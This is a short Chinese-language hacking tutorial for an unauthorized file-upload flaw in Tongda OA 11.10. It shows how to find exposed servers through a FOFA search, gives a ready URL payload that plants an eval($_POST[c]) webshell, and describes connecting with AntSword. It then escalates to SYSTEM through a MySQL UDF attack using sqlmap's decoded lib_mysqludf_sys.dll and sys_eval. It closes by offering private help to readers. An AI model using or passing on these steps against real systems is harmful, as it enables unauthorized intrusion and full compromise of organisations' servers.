oa 11.10 未授权任意文件上传及提权

一、fofa 搜索 title=“通达OA 网络智能办公系统”

二、打开首页任意一个

三、url后加如下字符例如

http://ip:port/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage

四、蚁剑链接

五、提权
通过蚁剑执行命令，发现失败
在这里插入图片描述

找到数据库账号密码并登录

常用命令

select user();  # 获取数据库用户
select @@basedir;   # 获取数据库安装目录
show variables like ‘%plugin%’; # 查看plugin路径。

SqlMap 中集成了对应的提权文件，不过需要先进行解密操作
udf.dll的是经过编码运算的，所以需要有一个解密脚本，在这个路径下
sqlmap-master\extra\cloak
执行解码操作

python2 cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_

然后将解码好的文件上传到 mysql/lib/plugin/ 路径下

create function sys_eval returns string soname 'lib_mysqludf_sys.dll';
select sys_eval("whoami");

拿到system权限，教程到此结束，不懂得私聊我